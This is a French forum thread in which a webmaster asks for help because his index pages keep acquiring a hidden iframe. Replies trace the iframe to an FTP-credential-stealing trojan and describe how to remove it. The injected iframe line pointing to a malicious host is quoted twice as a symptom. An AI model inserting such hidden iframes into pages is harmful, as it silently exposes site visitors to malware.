intégration automatique d'une balise < iframe> infectée

intégration automatique d'une balise < iframe> infectée - HTML/CSS - Programmation

Marsh Posté le 15-06-2009 à 13:39:07    

Bonjour,
 
Depuis quelques temps, j'ai des pages qui s'infectent d'elles-mêmes.
 
Cela concerne les pages index.php ou index.html.
 
Sans que je n'envoie mes pages par ftp, ces fameuses pages index sont infectées par une balise <iframe>, qui se situe juste après la balise <body>, qui ressemble à cela :
 

Code :
  1. <iframe src="http://bigtopbrands.cn:8080/index.php" width=197 height=106 style="visibility: hidden"></iframe>


 
Je remarque que la page se modifie dans le ftp sans que je n'y touche ! J'ai beau changer les mots de passe d'accès au serveur sans arrêt, elles sont toujours modifiées plus ou moins rapidement...
 
Que faire ??? Grand merci à qui pourra m'aider ...

Message cité 1 fois
Message édité par benou le 22-08-2009 à 18:09:29
Reply

Marsh Posté le 15-06-2009 à 13:39:07   

Reply

Marsh Posté le 15-06-2009 à 13:51:33    

As-tu essayé de protéger le fichier en écriture une fois qu'il est posé sur le serveur ?


---------------
Melodix Control vous présente son blog
Reply

Marsh Posté le 15-06-2009 à 14:06:59    

Non, je n'ai pas essayé ... Comment peut-on faire ça ?

Reply

Marsh Posté le 15-06-2009 à 14:26:59    

En changeant la valeur du CHMOD.
Si tu utilises un client ftp généralement c'est dans le menu affiché par clic droit sur le fichier.

Reply

Marsh Posté le 15-06-2009 à 16:30:50    

N'utilise pas de logiciel de créations de site / client FTP crackés !


---------------
What if I were smiling and running into your arms? Would you see then what I see now?  
Reply

Marsh Posté le 16-06-2009 à 09:27:05    

Non c'est moi qui m'occupe de créer mes propres sites, mais avec cette infection là, j'ai un peu du mal ...

Reply

Marsh Posté le 16-06-2009 à 14:34:58    

oli1987 a écrit :

Sans que je n'envoie mes pages par ftp, ces fameuses pages index sont infectées par une balise <iframe>, qui se situe juste après la balise <body>
(...)
Je remarque que la page se modifie dans le ftp sans que je n'y touche !

:heink:  
L'iframe "apparaît" quand exactement ?
Tu utilises quoi pour créer tes pages ?

Reply

Marsh Posté le 16-06-2009 à 18:28:04    

L'iframe apparait sans que je ne sois devant mon pc ! Et sur le serveur, je vois que la page a été modifée dans la nuit ou à une heure durant laquelle je n'étais pas sur le site !
 
J'utilise PSPad pour créer mes pages. Je pars d'un document vide à chaque fois ...

Reply

Marsh Posté le 16-06-2009 à 18:44:56    

Et par rapport à la remarque de jagstang tu utilises quoi comme client FTP ?

Reply

Marsh Posté le 17-06-2009 à 08:51:31    

La mjorité du temps, j'utilise WS Ftp Pro ...
 
Et de temps en temps via Internet Explorer si je ne suis pas sur mon ordi.

Reply

Marsh Posté le 17-06-2009 à 08:51:31   

Reply

Marsh Posté le 17-06-2009 à 09:05:35    

oli1987 a écrit :

L'iframe apparait sans que je ne sois devant mon pc ! Et sur le serveur, je vois que la page a été modifée dans la nuit ou à une heure durant laquelle je n'étais pas sur le site !
 
J'utilise PSPad pour créer mes pages. Je pars d'un document vide à chaque fois ...


OK, donc c'est un problème sur le serveur si je suis bien...
 
- L'iframe est bien écrite dans la page index (si tu la récupères via FTP tu as bien l'iframe ?)
- Quel hébergeur ?
- Tu as essayé avec une page index vierge ?
- Tu as regardé le .htaccess - si tu y as accès ?
- Tu as vérifié les droits en lecture/ecriture ?
- Rien d'autre pour le moment  :o

Reply

Marsh Posté le 17-06-2009 à 10:39:14    

c'est souvent une manie des hébergeur gratuits


---------------
What if I were smiling and running into your arms? Would you see then what I see now?  
Reply

Marsh Posté le 22-06-2009 à 18:19:06    

@macgawel
 
Déjà, merci de tes réponses.
 
L'iframe est bien écrite dans la page index, en effet. J'ai bien l'iframe quand je la récupère
 

Code :
  1. <iframe src="http://bigtopbrands.cn:8080/index.php" width=197 height=106 style="visibility: hidden"></iframe>


Je suis hébergé par Infomaniak (suisse).
 
J'ai bien accès au .htaccess.
 
J'ai vérifié les droits en lecture et écriture. Seul l'utilisateur y a accès. J'ai décoche "groupe".
 
 
Et j'ai encore eu le cas dernièrement ... :S

Reply

Marsh Posté le 22-06-2009 à 22:28:12    

vérifie ton fichier avant et après transfert. Regarde aussi la date de dernière modification. ça peut aussi venir de ton browser infecté par un malware. essaie un autre browser ou donne l'url ici


---------------
What if I were smiling and running into your arms? Would you see then what I see now?  
Reply

Marsh Posté le 23-06-2009 à 07:00:55    

La date de modification change quelques heures/jours après transfert, sans que je ne touche à quoi que ce soit ...
 
J'ai beau changer le mot de passe du serveur toutes les semaines ...

Reply

Marsh Posté le 23-06-2009 à 08:00:27    

Est-ce possible que ca vienne de mon code ?
J'ai un nouveau site depuis hier, et la page index.php est déjà infectée alors qu'il s'agit d'un tout autre serveur !!! Et non, je n'ai pas un dossier sur le web avec les serveurs et mots de passe.
 
Voici le code de la page avant qu'elle ne soit infectée :
 

Code :
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  2.         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  3. <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
  4. <head>
  5.   <meta http-equiv="content-language" content="be-FR" />
  6.   <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
  7.   <title>Nutrition-globale.be</title>
  8.   <link href="css/style.css" rel="stylesheet" type="text/css" />
  9.   </head>
  10.   <body>
  11.     <div id="container">
  12.       <div id="header">
  13.         &nbsp;
  14.       </div>
  15.      
  16.       <div id="links">
  17.       Liens
  18.       </div>
  19.      
  20.       <div id="content">
  21.       Site actuellement en construction.
  22.       </div>
  23.      
  24.       <div id="footer">
  25.       Pied de page - Contact - Adresse - Email - Partenaires - Liens - ...
  26.       </div>
  27.      
  28.     </div>
  29.   </body>
  30. </html>


 
L'iframe vient toujours après la balise <body> ... Il me faut vite une solution ...

Reply

Marsh Posté le 23-06-2009 à 08:39:35    

Bonjour,
je viens d'être infecté à mon tour  :fou:  
Ce n’est pas un problème de code oli1987.
Moi j'ai 4 sites sur hébergeur gratuit (FREE) et 1 site sur hébergeur payant (1AND1), ils sont tous infectés.
Comme a dit jagstang, il s’agit d'un malware qui cause le problème.
Ce malware récupère le login et mot de passe FTP (dans mon cas sur le logiciel FilleZilla) puis il injecte l'iframe après le body des pages index.
J'ai donc nettoyé le pc avec Malwarebytes.
Supprimé tous les login et mot de passe sur FilleZilla.
et j'ai changé tous les mots de passe des comptes FTP.
Bon courage   ;)
 
http://www.topsurf.fr


Message édité par Top Surf le 23-06-2009 à 08:41:30
Reply

Marsh Posté le 25-06-2009 à 14:56:12    

c'est un virus, j'ai déjà eu ca. EN fait au moment ou tu enregistres, il vérifie que le document contient la balise </body> et rajoute avant l'iframe.
Celui que j'avais pour faire pire est passé sur tout mon DD et à effectué cette manip sur tous mes fichiers HTML.
 
Bon scan


---------------
Pays et country_code traduits : https://www.iso-country-code.com
Reply

Marsh Posté le 26-06-2009 à 10:08:27    

Merci de vos conseils. Ca me rassure dans le sens ou je ne suis pas le seul a avoir connu cela. J'ai donc scanné l'ordi (malwarebytes, nod, ...). Il y avait quelques intrus, de fait. J'ai changé les mots de passe, et pour l'instant, tout va bien. Je redirai quoi dans quelques jours.
 
Merci à vous !

Reply

Marsh Posté le 30-06-2009 à 09:53:19    

Rebonjour,
 
Le fichier qui posait (et pose encore) problème se nomme wiaserva.log (c:\documents and settings\user\Application Data\wiaserva.log).
 
Si je le supprime, il fait son retour à chaque redémarrage de pc. Je viens de le supprimer de nouveau, mais ça ne peut pas durer éternellement ...
 
Y a-t-il une solution autre que le formatage ?

Reply

Marsh Posté le 30-06-2009 à 10:06:06    

As-tu cherché déjà "wiaserva.log" sur Google pour trouver le nom du virus ? Car à mon avis tu ne dois pas être le seul à l'avoir eu.
Mais à mon avis il n'y a pas que ce fichier car un .log je vois pas trop ce qu'il peut faire seul.

 

T'as fait un scan de ton pc avec quel AV ?


Message édité par Deamon le 30-06-2009 à 10:07:50
Reply

Marsh Posté le 30-06-2009 à 11:07:55    

[:google]  
Une recherche sur le fichier wiaserva.log donne en deuxième résultat le site de Symantec...

Reply

Marsh Posté le 30-06-2009 à 11:14:29    

J'ai fait un scan avec Nod32, mais rien trouvé ...

Reply

Marsh Posté le 30-06-2009 à 11:34:19    

En gros :
1. Le troyen se copie en %System%\wbem\grpconv.exe et crée le fichier %UserProfile%\Application Data\wiaserva.log
2. Il supprime les fichiers %System%\grpconv.exe et %System%\dllcache\grpconv.exe
3. Il crée la clé de registre HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"RunGrpConv" = "1"
 
=>
1. Démarrage en mode "sans echec"
2. Suppression de la clé de registre
3. Suppression des fichiers corrompus
4. Récupération du fichier sain (à partir du cd/dvd d'installation).
 
Là encore, il suffit de lire la fiche de Symantec  :ange:  
 
Sinon, tu devrais peut-être ouvrir un topic sur Virus-Spywares...

Reply

Marsh Posté le 20-08-2009 à 00:45:17    

Bonjour,
 
Une solution détaillée pour ce problème d'injection iframe:
 
Solution pour le problème d'attaque par injection iframe
 
.
 

Reply

Marsh Posté le 20-08-2009 à 16:22:51    

el_fantome a écrit :

Bonjour,

 

Une solution détaillée pour ce problème d'injection iframe:

 

Solution pour le problème d'attaque par injection iframe

 

.

 



SPAM

 

edit : homepage+first post

Message cité 1 fois
Message édité par jagstang le 20-08-2009 à 16:23:54

---------------
What if I were smiling and running into your arms? Would you see then what I see now?  
Reply

Marsh Posté le 20-08-2009 à 22:06:55    

jagstang a écrit :


SPAM
 
edit : homepage+first post


ok c'est son site, mais l'info qu'il donne est en rapport avec le sujet du topic, et il n'essaie pas de vendre quoi que ce soit [:jagstang]
Objection rejetée votre honneur :o


---------------
J'ai un string dans l'array (Paris Hilton)
Reply

Marsh Posté le 21-08-2009 à 10:15:47    

ouais mais c'est plutôt :  
1) je fais un article
2) je cherche comment le faire connaitre
3) je trouve un forum, je m'inscrit et je poste sur ce sujet...
 
c'est limite mais j'accepte la sentence :D


---------------
What if I were smiling and running into your arms? Would you see then what I see now?  
Reply

Marsh Posté le    

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed